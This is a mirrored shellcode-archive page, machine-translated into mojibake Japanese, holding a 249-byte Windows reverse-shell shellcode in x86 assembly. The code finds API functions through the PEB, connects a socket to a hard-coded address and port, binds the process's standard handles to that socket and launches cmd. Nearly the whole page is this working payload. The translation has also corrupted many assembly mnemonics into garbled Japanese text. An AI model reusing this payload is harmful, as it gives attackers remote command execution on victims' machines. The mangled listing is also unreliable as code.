Windows - µÕÅ¾¤¹¤ë Generic Shellcode w/o Loader

<BASE HREF="http://shell-storm.org/shellcode/files/shellcode-389.html">
<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=3 align=center>
<TR>
<TD BGCOLOR="#C71585">
<P><FONT COLOR="#FFFFFF">¤³¤Î¥Ú¡¼¥¸¤Ï<A HREF="http://www.yansite.net/others.html#EtoJ"><FONT COLOR="#99FFCC">EtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿</FONT></A>¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£</FONT></P>
</TD>
<TD BGCOLOR="#000000">
<P><FONT COLOR="#FFFFFF"><A HREF="http://shell-storm.org/shellcode/files/shellcode-389.html">ËÝÌõÁ°¥Ú¡¼¥¸¤Ø</A></FONT></P>
</TD>
</TR>
</TABLE>
<HR>
<html><head><title>Windows - µÕÅ¾¤¹¤ë Generic Shellcode w/o Loader - 249 bytes</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta http-equiv="Content-Language" content="en" />
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NLNHL50HG5"></script>
<script src="../../assets/js/gtag.js"></script>
</head>


<pre>
We use the PEB for the À¸»º¡Ê¹â¡Ë/Input/Error °·¤¦s.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
BOOLEAN Spare ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB LDR DATA LoaderData ;
PRTL USER PROCESS PARAMETERS ProcessParameters ;
...
typedef struct RTL USER PROCESS PARAMETERS
ULONG MaximumLength ;
ULONG Length ;
ULONG ´ús ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h
...

So with the nooil tricks we have now :
mov eax,dword ptr fs :[18h]
mov eax,dword ptr ds :[eax+30h]
mov eax,dword ptr ds :[eax+10h]
mov ecx, hClientSocket
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD INPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD OUTPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD ERROR HANDLE,hClientSocket) ;

249 bytes µÕÅ¾¤¹¤ë Generic Shellcode without loader(no null byte) :

comment *
-----------------------------------------------------------------
---- New À¤Âå shellcode using my &quot;nooil tricks&quot; methods ---
----    (c) 2005 - Matthieu Suiche / msuiche@gmail.com        ---
249 bytes µÕÅ¾¤¹¤ë Generic Shellcode without loader(no null byte)
-----------------------------------------------------------------
hehe hi metasploit's guys ;)
*
.386
.model flat, stdcall

assume fs:nothing

LoadLibraryA    equ 0D6C3D898h
WSAStartupA     equ 0C7B3B4CBh
WSASocketA      equ 0B8ACB6C6h
connect                 equ 06EE2D2C8h
system                  equ 0E873E6D8h
ExitProcessA    equ 0D7D8EA95h
; ------------------------------
sin_addr                equ 0B01A8C0h ; 192.168.1.11
sin_port                equ 3713h       ; 4919
; ------------------------------
str_cmd                 equ 0FF646D63h

; ----------------------------------------------------
_nooil_ segment public ; writable section
;.
; ----- CODE -----
scode:
       jmp short _eip
       GetEip:
       pop             edi
       jmp short EntryPoint
_eip:
       call    GetEip
Kernel32BaseAddr:
       pushad
       ¼Â¸³¡Ê¤¹¤ë¡Ë    eax, eax
       jnz             MyGetProcAddr
       ; eax = 0
       mov     eax, dword ptr fs:[eax+30h]
       mov     eax, dword ptr ds:[eax+0ch]
       mov     esi, dword ptr ds:[eax+1ch]
       lodsd
       mov     eax, dword ptr ds:[eax+08h]
MyGetProcAddr:
       mov             edx, eax

; - PE
       ÄÉ²Ã¤¹¤ë             edx, dword ptr ds:[edx+3ch]

; - Í¢½Ð¡Ê¤¹¤ë¡Ë ¡ÊÊÆ¡ËÃª¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë
       mov             edx, dword ptr ds:[edx+78h]
       ÄÉ²Ã¤¹¤ë             edx, eax

       mov     ebx, dword ptr ds:[edx+20h]
       ÄÉ²Ã¤¹¤ë             ebx, eax

       xor             ecx, ecx
       mov             ebp, eax

FindAddr:
       inc             ecx
       mov     edi, dword ptr ds:[ebx+ecx*4]
       ÄÉ²Ã¤¹¤ë             edi, eax

       mov             esi, dword ptr [edi]
       ÄÉ²Ã¤¹¤ë             esi, dword ptr [edi+4]
       cmp             esi, [esp+36]
       jz              AddrFound
       jmp             short FindAddr

AddrFound:

       mov     ebx, dword ptr ds:[edx+24h]
       ÄÉ²Ã¤¹¤ë     ebx, ebp
       mov     cx,word ptr ds:[ebx+ecx*2]

       mov     ebx, dword ptr ds:[edx+1Ch]
       ÄÉ²Ã¤¹¤ë     ebx, ebp
       ÄÉ²Ã¤¹¤ë     ebp, dword ptr ds:[ebx+ecx*4]

       mov             dword ptr [esp+28], ebp
       popad
       retn

EntryPoint:
       xor             eax, eax
       xor             ecx, ecx
       ²¡¤·¿Ê¤á¤ë    LoadLibraryA
       call    edi                                                     ; MyGetProcAddr(LoadLibraryA);
       mov             ebp, eax

       ²¡¤·¿Ê¤á¤ë    cx
       ²¡¤·¿Ê¤á¤ë    word ptr '23'
       ²¡¤·¿Ê¤á¤ë    '_2sw'
       ²¡¤·¿Ê¤á¤ë    esp
       call    eax             ; LoadLibraryA(&quot;ws2_32&quot;);

       mov             ebx, eax

       ²¡¤·¿Ê¤á¤ë    WSAStartupA
       call    edi             ; MyGetProcAddr(WSAStartupA)


       mov             esi, esp
       ÄÉ²Ã¤¹¤ë             si, -301h
       ²¡¤·¿Ê¤á¤ë    esi
       ²¡¤·¿Ê¤á¤ë    2
       call    eax             ; WSAStartup(2,&amp;WSAstruct);

       mov             eax, ebx

       ²¡¤·¿Ê¤á¤ë    WSASocketA
       call    edi             ; MyGetProcAddr(WSASocketA);

       xor             esi, esi
       ²¡¤·¿Ê¤á¤ë    esi
       ²¡¤·¿Ê¤á¤ë    esi
       ²¡¤·¿Ê¤á¤ë    esi
       ²¡¤·¿Ê¤á¤ë    esi
       inc             esi
       ²¡¤·¿Ê¤á¤ë    esi
       inc             esi
       ²¡¤·¿Ê¤á¤ë    esi
       call    eax             ; WSASocket(2,1,0,0,0,0);

       xchg    ebx, eax ; ebx = sockfd , eax = ws2_32

       ²¡¤·¿Ê¤á¤ë    sin_addr
       ²¡¤·¿Ê¤á¤ë    word ptr sin_port
       ²¡¤·¿Ê¤á¤ë    si
       mov             esi, esp

       ²¡¤·¿Ê¤á¤ë    connect
       call    edi             ; MyGetProcAddr(connect)

       ²¡¤·¿Ê¤á¤ë    10h
       ²¡¤·¿Ê¤á¤ë    esi
       ²¡¤·¿Ê¤á¤ë    ebx
       call    eax             ; connect(sockfd, &amp;struct, sizeof(struct));

       ²¡¤·¿Ê¤á¤ë    ax
       ²¡¤·¿Ê¤á¤ë    word ptr 'tr'
       ²¡¤·¿Ê¤á¤ë    'cvsm'
       ²¡¤·¿Ê¤á¤ë    esp
       call    ebp             ; LoadLibraryA(&quot;msvcrt&quot;);

       ²¡¤·¿Ê¤á¤ë    system
       call    edi             ; MyGetProcAddr(system);

       ; ----------------------------- nooil tricks ----------------------------------
       xor             ecx, ecx
       mov             ecx,dword ptr fs:[ecx+18h]
       mov             ecx,dword ptr ds:[ecx+30h]
       mov             ecx,dword ptr ds:[ecx+10h]
       mov             dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
       mov     dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
       mov     dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
       ; -----------------------------------------------------------------------------


       ²¡¤·¿Ê¤á¤ë    str_cmd
       inc             byte ptr [esp+3]
       ²¡¤·¿Ê¤á¤ë    esp
       call    eax     ; system(&quot;cmd&quot;);

       ; ½Ð¸ý
       ²¡¤·¿Ê¤á¤ë    ExitProcessA
       call    edi             ; MyGetProcAddr(ExitProcessA)
       call    eax             ; ExitProcessA();
end scode
; ------ END CODE ------
;.
_nooil_ ends
; ----------------------------------------------------


</pre></html>